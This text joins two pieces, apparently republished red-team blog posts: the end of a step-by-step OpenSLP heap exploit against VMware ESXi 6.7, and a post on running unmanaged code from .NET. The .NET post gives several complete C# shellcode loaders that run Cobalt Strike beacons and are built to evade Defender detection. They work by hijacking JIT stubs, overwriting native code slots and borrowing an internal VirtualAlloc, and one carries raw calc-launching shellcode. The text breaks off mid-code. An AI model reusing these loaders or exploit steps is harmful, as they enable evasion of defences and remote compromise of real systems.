  4. Clients 11–21 sets up the arbitrary read primitive by overwriting client 15’s ‘send-buffer’ position pointers. Since I have no knowledge of what addresses to leak in the first place, I will perform a partial overwrite of the last two significant bytes of the ‘start’ position pointer with null values. This requires setting up the extended free chunk to be marked ‘IS_MAPPED’ to avoid getting zeroed out by the ‘calloc’ call. The ‘send-buffer’ that gets updated belongs to the ‘attribute request’ message. As I have no visibility to how much data will be leaked, I can get a ballpark idea of where the leak is at by including a marker value as part of the ‘service registration’ message noted in step 3. If the leaked content contains the marker, I know it is leaking data from the ‘attribute request’ ‘send-buffer’ object. This tells me it is about time to stop reading from the leak. Lastly, I have to update client 15’s ‘slpd-socket’ to have its state to be in ‘STREAM_WRITE’, which will makes the ‘send’ call to my client.
  5. I was able to collect heap addresses and libc addresses from the leak which I can derive everything else. My goal is to overwrite libc’s __free_hook with libc’s system address. I will need a gadget to position my stack at a location that won’t be subject to alteration by the application. I found a gadget from libc-2.17.so that will stack lift the stack address by 0x100.
  6. With the collected libc address, I can calculate the libc environment address which stores the stack address. I use clients 22–31 to setup the arbitrary read primitive to leak the stack address. I have to update client 25’s file descriptor in the ‘slpd-socket’ to hold the listening file descriptor.
  7. Clients 32–40 sets up the arbitrary write primitive. This requires overwriting client 33’s ‘recv-buffer’ object’s position pointers. It first stores shell commands into client 15’s ‘send-buffer’ object, which is a large slab of space under my control. It then writes the libc’s system address, a fake return address, and the address of the shell command onto the predicted stack location after stack lifting is performed. Afterwards, it overwrites libc’s __free_hook to hold the stack lifting gadget address. Lastly, each arbitrary write requires updating the corresponding ‘slpd-socket’ object state to ‘STREAM_READ’. If this step is skipped, the server will not accept the overwritten values for the position pointers.
  8. The desired shell commands will be executed once all the above steps are completed.

Final Remark

I enjoyed implementing this exploit very much and learned a few things when writing it. One of the biggest thing I learn is never make an assumption and should always test an idea out. When I was trying to get the leaking data part of the exploit code to work, I was preparing to implement it the way Lucas described in his blog, which seems slightly complicated. I was curious as to why I can’t just flip the socket object’s state to ‘STREAM_WRITE’ which send the data back to me. After reviewing the OpenSLP code, I understand the problem and see why Lucas came up with his particular solution. Nevertheless, I still wanted to see what happens if I just flip the state on the socket object, and to my disbelief, the daemon did send me the leaked data immediately without going through the additional hurdles. Another take away is when doing any heap grooming design, it is best to work it backward from how I want the heap to look in its finished form, and back track the layout to the beginning.

The PoC should work out of the box against VMware ESXi 6.7.0 build-14320388, which is the trial version. I was able to get it to work 14 out of 15 tries.

Weird Ways to Run Unmanaged Code in .NET

Weird Ways to Run Unmanaged Code in .NET

Original text by Adam Chester

Ever since the release of the .NET framework, the offensive security industry has spent a considerable amount of time crafting .NET projects to accommodate unmanaged code. Usually this comes in the form of a loader, wrapping payloads like Cobalt Strike beacon and invoking executable memory using a few P/Invoke imports. But with endless samples being studied by defenders, the process of simply dllimport’ing Win32 APIs has become more of a challenge, giving rise to alternate techniques such as D/Invoke.

Recently I have been looking at the .NET Common Language Runtime (CLR) internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snippet of some of the weird techniques that I found.

The samples in this post will focus on .NET 5.0 executing x64 binaries on Windows. The decision by Microsoft to unify .NET means that moving forwards we are going to be working with a single framework rather than the current fragmented set of versions we’ve been used to. That being said, all of the areas discussed can be applied to earlier versions of the .NET framework, other architectures and operating systems… let’s get started.

A Quick History Lesson

What are we typically trying to achieve when executing unmanaged code in .NET? Often for us as Red Teamer’s we are looking to do something like running a raw beacon payload, where native code is executed from within a C# wrapper.

For a long time, the most common way of doing this looked something like:

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

[DllImport("kernel32.dll")]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

public static void StartShellcode(byte[] shellcode)
{
    uint threadId;

    IntPtr alloc = VirtualAlloc(IntPtr.Zero, shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
    if (alloc == IntPtr.Zero) {
        return;
    }

    Marshal.Copy(shellcode, 0, alloc, shellcode.Length);
    IntPtr threadHandle = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, out threadId);
    WaitForSingleObject(threadHandle, 0xFFFFFFFF);
}

And all was fine, however it did not take long before defenders realised that a .NET binary referencing a bunch of suspicious methods provided a good indicator that the binary warranted further investigation:

And as an example of the obvious indicators that these imported methods yield, you will see that if you try and compile the above example on a machine protected by Defender, Microsoft will pop up a nice warning that you’ve just infected yourself with VirTool:MSIL/Viemlod.gen!A.

So with these detections throwing a spanner in the works, techniques of course evolved. One such evolution of unmanaged code execution came from the awesome research completed by @fuzzysec and @TheRealWover, who introduced the D/Invoke technique. If we exclude the projects DLL loader for the moment, the underlying technique to transition from managed to unmanaged code used by D/Invoke is facilitated by a crucial method, Marshal.GetDelegateForFunctionPointer. And if we look at the documentation, Microsoft tells us that this method “Converts an unmanaged function pointer to a delegate”. This gets around the fundamental problem of exposing those nasty imports, forcing defenders to go beyond the ImplMap table. A simple example of how we might use Marshal.GetDelegateForFunctionPointer to execute unmanaged code within a x64 process would be:

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr VirtualAllocDelegate(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr ShellcodeDelegate();

public static IntPtr GetExportAddress(IntPtr baseAddr, string name)
{
    var dosHeader = Marshal.PtrToStructure<IMAGE_DOS_HEADER>(baseAddr);
    var peHeader = Marshal.PtrToStructure<IMAGE_OPTIONAL_HEADER64>(baseAddr + dosHeader.e_lfanew + 4 + Marshal.SizeOf<IMAGE_FILE_HEADER>());
    var exportHeader = Marshal.PtrToStructure<IMAGE_EXPORT_DIRECTORY>(baseAddr + (int)peHeader.ExportTable.VirtualAddress);

    for (int i = 0; i < exportHeader.NumberOfNames; i++)
    {
        var nameAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfNames + (i * 4));
        var m = Marshal.PtrToStringAnsi(baseAddr + (int)nameAddr);
        if (m == "VirtualAlloc")
        {
            var exportAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfFunctions + (i * 4));
            return baseAddr + (int)exportAddr;
        }
    }

    return IntPtr.Zero;
}

public static void StartShellcodeViaDelegate(byte[] shellcode)
{
    IntPtr virtualAllocAddr = IntPtr.Zero;

    foreach (ProcessModule module in Process.GetCurrentProcess().Modules)
    {
        if (module.ModuleName.ToLower() == "kernel32.dll")
        {
            virtualAllocAddr = GetExportAddress(module.BaseAddress, "VirtualAlloc");
        }
    }

    var VirtualAlloc = Marshal.GetDelegateForFunctionPointer<VirtualAllocDelegate>(virtualAllocAddr);
    var execMem = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);

    Marshal.Copy(shellcode, 0, execMem, shellcode.Length);

    var shellcodeCall = Marshal.GetDelegateForFunctionPointer<ShellcodeDelegate>(execMem);
    shellcodeCall();
}

So, with these methods out in the wild, are there any other techniques that we have available to us?

Targeting What We Cannot See

One of the areas hidden from casual .NET developers is the underlying CLR itself. Thankfully, Microsoft releases the source code for the CLR on GitHub, giving us a peek into how this beast actually operates.

Let’s start by looking at a very simple application:

using System;
using System.Runtime.InteropServices;

namespace Test
{
    public class Test
    {
        public static void Main(string[] args)
        {
            var testObject = "XPN TEST";
            GCHandle handle = GCHandle.Alloc("HELLO");
            IntPtr parameter = (IntPtr)handle;
            Console.WriteLine("testObject at addr: {0}", parameter);
            Console.ReadLine();
        }
    }
}

Once we have this compiled, we can attach WinDBG to gather some information on the internals of the CLR during execution. We’ll start with the pointer outputted by this program and use the !dumpobj command provided by the SOS extension to reveal some information on what the memory address references:

As expected, we see that this memory points to a System.String .NET object, and we find the addresses of various associated fields available to us. The first class that we are going to look at is MethodTable, which represents a .NET class or interface to the CLR. We can inspect this further with a WinDBG helper method of !dumpmt [ADDRESS]:

We can also dump a list of methods associated with the System.String .NET class with !dumpmt -md [ADDRESS]:

So how are the System.String .NET methods found relative to a MethodTable? Well according to what has become a bit of a bible of .NET internals for me, we need to study the EEClass class. We can do this using dt coreclr!EEClass [ADDRESS]:

Again, we see several fields, but of interest to identifying associated .NET methods is the m_pChunks field, which references a MethodDescChunk object consisting of a simple structure:

Appended to a MethodDescChunk object is an array of MethodDesc objects, which represent .NET methods exposed by the .NET class (in our case System.String). Each MethodDesc is aligned to 18 bytes when running within a x64 process:

To retrieve information on this method, we can pass the address over to the !dumpmd helper command which tells us that the first .NET method of our System.String is System.String.Replace:

Now before we continue, it’s worth giving a quick insight into how the JIT compilation process works when executing a method from .NET. As I’ve discussed in previous posts, the JIT process is “lazy” in that a method won’t be JIT’ed up front (with some exceptions which we won’t cover here). Instead compilation is deferred to first use, by directing execution via the coreclr!PrecodeFixupThunk method, which acts as a trampoline to compile the method:

Once a method is executed, the native code is JIT’ed and this trampoline is replaced with a JMP to the actual compiled code.

So how do we find the pointer to this trampoline? Well usually this pointer would live in a slot, which is located within a vector following the MethodTable, which is in turn indexed by the n_wSlotNumber of the MethodDesc object. But in some cases, this pointer immediately follows the MethodDesc object itself, as a so called “Local Slot”. We can tell if this is the case by looking at the m_wFlags member of the MethodDesc object for a method, and seeing if the following flag has been set:

If we dump the memory for our MethodDesc, we can see this pointer being located immediately after the object:

OK with our knowledge of how the JIT process works and some idea of how the memory layout of a .NET method looks in unmanaged land, let’s see if we can use this to our advantage when looking to execute unmanaged code.

Hijacking JIT Compilation to Execute Unmanaged Code

To execute our unmanaged code, we need to gain control over the RIP register, which now that we understand just how execution flows via the JIT process should be relatively straight forward.

To do this we will define a few structures which will help us to follow along and demonstrate our POC code a little more clearly. Let’s start with a MethodTable:

[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
    [FieldOffset(0)]
    public uint m_dwFlags;

    [FieldOffset(0x4)]
    public uint m_BaseSize;

    [FieldOffset(0x8)]
    public ushort m_wFlags2;

    [FieldOffset(0x0a)]
    public ushort m_wToken;

    [FieldOffset(0x0c)]
    public ushort m_wNumVirtuals;

    [FieldOffset(0x0e)]
    public ushort m_wNumInterfaces;

    [FieldOffset(0x10)]
    public IntPtr m_pParentMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pLoaderModule;

    [FieldOffset(0x20)]
    public IntPtr m_pWriteableData;

    [FieldOffset(0x28)]
    public IntPtr m_pEEClass;

    [FieldOffset(0x30)]
    public IntPtr m_pPerInstInfo;

    [FieldOffset(0x38)]
    public IntPtr m_pInterfaceMap;
}

Then we will also require a EEClass:

[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
    [FieldOffset(0)]
    public IntPtr m_pGuidInfo;

    [FieldOffset(0x8)]
    public IntPtr m_rpOptionalFields;

    [FieldOffset(0x10)]
    public IntPtr m_pMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pFieldDescList;

    [FieldOffset(0x20)]
    public IntPtr m_pChunks;
}

Next we need our MethodDescChunk:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
    [FieldOffset(0)]
    public IntPtr m_methodTable;

    [FieldOffset(8)]
    public IntPtr m_next;

    [FieldOffset(0x10)]
    public byte m_size;

    [FieldOffset(0x11)]
    public byte m_count;

    [FieldOffset(0x12)]
    public byte m_flagsAndTokenRange;
}

And finally a MethodDesc:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
    [FieldOffset(0)]
    public ushort m_wFlags3AndTokenRemainder;

    [FieldOffset(2)]
    public byte m_chunkIndex;

    [FieldOffset(0x3)]
    public byte m_bFlags2;

    [FieldOffset(0x4)]
    public ushort m_wSlotNumber;

    [FieldOffset(0x6)]
    public ushort m_wFlags;

    [FieldOffset(0x8)]
    public IntPtr TempEntry;
}

With each structure defined, we’ll work with the System.String type and populate each struct:

Type t = typeof(System.String);
var mt = Marshal.PtrToStructure<MethodTable>(t.TypeHandle.Value);
var ee = Marshal.PtrToStructure<EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<MethodDescChunk>(ee.m_pChunks);
var md = Marshal.PtrToStructure<MethodDesc>(ec.m_pChunks + 0x18);

One snippet from above worth mentioning is t.TypeHandle.Value. Usefully for us, .NET provides us with a way to find the address of a MethodTable via the TypeHandle property of a type. This saves us some time hunting through memory when we are looking to target a .NET class such as the above System.String type.

Once we have the CLR structures for the System.String type, we can find our first .NET method pointer which as we saw above points to System.String.Replace:

// Located at MethodDescChunk_ptr + sizeof(MethodDescChunk) + sizeof(MethodDesc)
IntPtr stub = Marshal.ReadIntPtr(ee.m_pChunks + 0x18 + 0x8);

This gives us an IntPtr pointing to RWX protected memory, which we know is going to be executed once we invoke the System.String.Replace method for the first time, which will be when JIT compilation kicks in. Let’s see this in action by jmp‘ing to some unmanaged code. We will of course use a Cobalt Strike beacon to demonstrate this:

byte[] shellcode = System.IO.File.ReadAllBytes("beacon.bin");
mem = VirtualAlloc(IntPtr.Zero, shellcode.Length, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
if (mem == IntPtr.Zero) {
    return;
}

Marshal.Copy(shellcode, 0, ptr2, shellcode.Length);

// Now we invoke our unmanaged code
"ANYSTRING".Replace("XPN","WAZ'ERE", true, null);

Put together we get code like this:

using System;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ExecStubOverwrite
{
public static void Execute(byte[] shellcode)
{
// mov rax, 0x4141414141414141
// jmp rax
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
var t = typeof(System.String);
var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
{
Console.WriteLine(«[x] Error: mdcHasNonVtableSlot not set for this MethodDesc»);
return;
}
// Get the String.Replace method stub
IntPtr stub = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 8);
// Alloc mem with p/invoke for now…
var mem = Internals.VirtualAlloc(IntPtr.Zero, shellcode.Length, Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite);
Marshal.Copy(shellcode, 0, mem, shellcode.Length);
// Point the stub to our shellcode
Marshal.Copy(jmpCode, 0, stub, jmpCode.Length);
Marshal.WriteIntPtr(stub + 2, mem);
// FIRE!!
«ANYSTRING».Replace(«XPN», «WAZ’ERE», true, null);
}
}
public static class Internals
{
[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
[FieldOffset(0)]
public uint m_dwFlags;
[FieldOffset(0x4)]
public uint m_BaseSize;
[FieldOffset(0x8)]
public ushort m_wFlags2;
[FieldOffset(0x0a)]
public ushort m_wToken;
[FieldOffset(0x0c)]
public ushort m_wNumVirtuals;
[FieldOffset(0x0e)]
public ushort m_wNumInterfaces;
[FieldOffset(0x10)]
public IntPtr m_pParentMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pLoaderModule;
[FieldOffset(0x20)]
public IntPtr m_pWriteableData;
[FieldOffset(0x28)]
public IntPtr m_pEEClass;
[FieldOffset(0x30)]
public IntPtr m_pPerInstInfo;
[FieldOffset(0x38)]
public IntPtr m_pInterfaceMap;
}
[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
[FieldOffset(0)]
public IntPtr m_pGuidInfo;
[FieldOffset(0x8)]
public IntPtr m_rpOptionalFields;
[FieldOffset(0x10)]
public IntPtr m_pMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pFieldDescList;
[FieldOffset(0x20)]
public IntPtr m_pChunks;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
[FieldOffset(0)]
public IntPtr m_methodTable;
[FieldOffset(8)]
public IntPtr m_next;
[FieldOffset(0x10)]
public byte m_size;
[FieldOffset(0x11)]
public byte m_count;
[FieldOffset(0x12)]
public byte m_flagsAndTokenRange;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
[FieldOffset(0)]
public ushort m_wFlags3AndTokenRemainder;
[FieldOffset(2)]
public byte m_chunkIndex;
[FieldOffset(0x3)]
public byte m_bFlags2;
[FieldOffset(0x4)]
public ushort m_wSlotNumber;
[FieldOffset(0x6)]
public ushort m_wFlags;
[FieldOffset(0x8)]
public IntPtr TempEntry;
}
public const int mdcHasNonVtableSlot = 0x0008;
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
[DllImport(«kernel32.dll», SetLastError = true, ExactSpelling = true)]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
}
}

view rawExecStubOverwrite.cs hosted with ❤ by GitHub

Once executed, if everything goes well, we end up with our beacon spawning from within .NET:

Now I know what you’re thinking… what about that VirtualAlloc call that we made there… wasn’t that a P/Invoke that we were trying to avoid? Well, yes smarty pants! This was a P/Invoke, however in-keeping with our exploration of weird ways to invoke .NET, there is nothing stopping us from stealing an existing P/Invoke from the .NET framework. For example, if we look within the Interop.Kernel32 class, we’ll see a list of P/Invoke methods, including… VirtualAlloc:

So, what about if we just borrow that VirtualAlloc method for our evil bidding? Then we don’t have to P/Invoke directly from our code:

var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), 0x3000, 0x40 });

Now unfortunately the Interop.Kernel32.VirtualAlloc P/Invoke method returns a void*, which means that we receive a System.Reflection.Pointer type. This normally requires an unsafe method to play around with, which for the purposes of this post I’m trying to avoid. So let’s try and convert that into an IntPtr using the internal GetPointerValue method:

IntPtr alloc = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });

And there we have allocated RWX memory without having to directly reference any P/Invoke methods. Combined with our execution example, we end up with a POC like this:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ExecStubOverwriteWithoutPInvoke
{
public static void Execute(byte[] shellcode)
{
// mov rax, 0x4141414141414141
// jmp rax
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
var t = typeof(System.String);
var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
{
Console.WriteLine(«[x] Error: mdcHasNonVtableSlot not set for this MethodDesc»);
return;
}
// Get the String.Replace method stub
IntPtr stub = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 8);
// Nick p/invoke from CoreCLR Interop.Kernel32.VirtualAlloc
var kernel32 = typeof(System.String).Assembly.GetType(«Interop+Kernel32»);
var VirtualAlloc = kernel32.GetMethod(«VirtualAlloc», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
// Allocate memory
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
// Convert void* to IntPtr
IntPtr mem = (IntPtr)ptr.GetType().GetMethod(«GetPointerValue», BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
Marshal.Copy(shellcode, 0, mem, shellcode.Length);
// Point the stub to our shellcode
Marshal.Copy(jmpCode, 0, stub, jmpCode.Length);
Marshal.WriteIntPtr(stub + 2, mem);
// FIRE!!
«ANYSTRING».Replace(«XPN», «WAZ’ERE», true, null);
}
public static class Internals
{
[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
[FieldOffset(0)]
public uint m_dwFlags;
[FieldOffset(0x4)]
public uint m_BaseSize;
[FieldOffset(0x8)]
public ushort m_wFlags2;
[FieldOffset(0x0a)]
public ushort m_wToken;
[FieldOffset(0x0c)]
public ushort m_wNumVirtuals;
[FieldOffset(0x0e)]
public ushort m_wNumInterfaces;
[FieldOffset(0x10)]
public IntPtr m_pParentMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pLoaderModule;
[FieldOffset(0x20)]
public IntPtr m_pWriteableData;
[FieldOffset(0x28)]
public IntPtr m_pEEClass;
[FieldOffset(0x30)]
public IntPtr m_pPerInstInfo;
[FieldOffset(0x38)]
public IntPtr m_pInterfaceMap;
}
[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
[FieldOffset(0)]
public IntPtr m_pGuidInfo;
[FieldOffset(0x8)]
public IntPtr m_rpOptionalFields;
[FieldOffset(0x10)]
public IntPtr m_pMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pFieldDescList;
[FieldOffset(0x20)]
public IntPtr m_pChunks;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
[FieldOffset(0)]
public IntPtr m_methodTable;
[FieldOffset(8)]
public IntPtr m_next;
[FieldOffset(0x10)]
public byte m_size;
[FieldOffset(0x11)]
public byte m_count;
[FieldOffset(0x12)]
public byte m_flagsAndTokenRange;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
[FieldOffset(0)]
public ushort m_wFlags3AndTokenRemainder;
[FieldOffset(2)]
public byte m_chunkIndex;
[FieldOffset(0x3)]
public byte m_bFlags2;
[FieldOffset(0x4)]
public ushort m_wSlotNumber;
[FieldOffset(0x6)]
public ushort m_wFlags;
[FieldOffset(0x8)]
public IntPtr TempEntry;
}
public const int mdcHasNonVtableSlot = 0x0008;
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
}
}

view rawExecStubOverwriteWithoutPInvoke.cs hosted with ❤ by GitHub

And when executed, we get a nice beacon:

Now this is nice, but what about if we want to run unmanaged code and then resume executing further .NET code afterwards? Well we can do this in a few ways, but let’s have a look at what happens to our MethodDesc after the JIT process has completed. If we take a memory dump of the String.Replace MethodDesc before we have it JIT’d:

And then we look again after, we will see an address being populated:

And if we dump the memory from this address:

What you are seeing here is called a “Native Code Slot”, which is a pointer to the compiled methods native code once the JIT process has completed. Now this field is not guaranteed to be present, and we can tell if the MethodDesc provides a location for a Native Code Slot by again looking at the m_wFlags property:

The flag that we are looking to be set is mdcHasNativeCodeSlot:

If this flag is present, we can simply force JIT compilation and update the Native Code Slot, pointing it to our desired unmanaged code, meaning further execution of the .NET method will trigger our payload. Once executed, we can then jump back to the actual JIT’d native code to ensure that the original .NET code is executed. The code to do this looks like this:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ExecNativeSlot
{
public static void Execute()
{
// WinExec of calc.exe, jmps to address set in last 8 bytes
var shellcode = new byte[]
{
0x55, 0x48, 0x89, 0xe5, 0x9c, 0x53, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
0x41, 0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
0x56, 0x57, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x48,
0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30,
0x48, 0x8b, 0x7e, 0x30, 0x8b, 0x5f, 0x3c, 0x48, 0x01, 0xfb, 0xba, 0x88,
0x00, 0x00, 0x00, 0x8b, 0x1c, 0x13, 0x48, 0x01, 0xfb, 0x8b, 0x43, 0x20,
0x48, 0x01, 0xf8, 0x48, 0x89, 0xc6, 0x48, 0x31, 0xc9, 0xad, 0x48, 0x01,
0xf8, 0x81, 0x38, 0x57, 0x69, 0x6e, 0x45, 0x74, 0x05, 0x48, 0xff, 0xc1,
0xeb, 0xef, 0x8b, 0x43, 0x1c, 0x48, 0x01, 0xf8, 0x8b, 0x04, 0x88, 0x48,
0x01, 0xf8, 0xba, 0x05, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x25, 0x00,
0x00, 0x00, 0xff, 0xd0, 0x5f, 0x5e, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d,
0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59,
0x5b, 0x9d, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x8b, 0x05, 0x0b, 0x00, 0x00,
0x00, 0xff, 0xe0, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
var t = typeof(System.String);
var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
{
Console.WriteLine(«[x] Error: mdcHasNonVtableSlot not set for this MethodDesc»);
return;
}
if ((md.m_wFlags & Internals.mdcHasNativeCodeSlot) != Internals.mdcHasNativeCodeSlot)
{
Console.WriteLine(«[x] Error: mdcHasNativeCodeSlot not set for this MethodDesc»);
return;
}
// Trigger Jit of String.Replace method
«ANYSTRING».Replace(«XPN», «WAZ’ERE», true, null);
// Get the String.Replace method native code pointer
IntPtr nativeCodePointer = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 0x10);
// Steal p/invoke from CoreCLR Interop.Kernel32.VirtualAlloc
var kernel32 = typeof(System.String).Assembly.GetType(«Interop+Kernel32»);
var VirtualAlloc = kernel32.GetMethod(«VirtualAlloc», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
// Allocate memory
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
// Convert void* to IntPtr
IntPtr mem = (IntPtr)ptr.GetType().GetMethod(«GetPointerValue», BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
Marshal.Copy(shellcode, 0, mem, shellcode.Length);
// Take the original address
var orig = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 0x10);
// Point the native code pointer to our shellcode directly
Marshal.WriteIntPtr(ec.m_pChunks + 0x18 + 0x10, mem);
// Set original address
Marshal.WriteIntPtr(mem + shellcode.Length — 8, orig);
// Charging Ma Laz0r…
System.Threading.Thread.Sleep(1000);
// FIRE!!
«ANYSTRING».Replace(«XPN», «WAZ’ERE», true, null);
// Restore previous native address now that we’re done
Marshal.WriteIntPtr(ec.m_pChunks + 0x18 + 0x10, orig);
}
public static class Internals
{
[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
[FieldOffset(0)]
public uint m_dwFlags;
[FieldOffset(0x4)]
public uint m_BaseSize;
[FieldOffset(0x8)]
public ushort m_wFlags2;
[FieldOffset(0x0a)]
public ushort m_wToken;
[FieldOffset(0x0c)]
public ushort m_wNumVirtuals;
[FieldOffset(0x0e)]
public ushort m_wNumInterfaces;
[FieldOffset(0x10)]
public IntPtr m_pParentMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pLoaderModule;
[FieldOffset(0x20)]
public IntPtr m_pWriteableData;
[FieldOffset(0x28)]
public IntPtr m_pEEClass;
[FieldOffset(0x30)]
public IntPtr m_pPerInstInfo;
[FieldOffset(0x38)]
public IntPtr m_pInterfaceMap;
}
[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
